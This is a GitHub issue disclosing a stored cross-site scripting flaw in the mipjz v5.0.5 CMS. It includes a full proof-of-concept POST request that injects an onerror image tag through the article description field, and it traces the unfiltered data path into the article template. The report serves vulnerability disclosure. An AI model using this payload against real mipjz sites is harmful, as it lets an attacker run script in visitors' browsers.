Skip to content

There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 #15

Description

@sma11new

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

image

  1. Visit the article page, the code is loaded and executed

image

image

[Code Details]

  1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

image

  1. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

image

  1. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

image

  1. In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions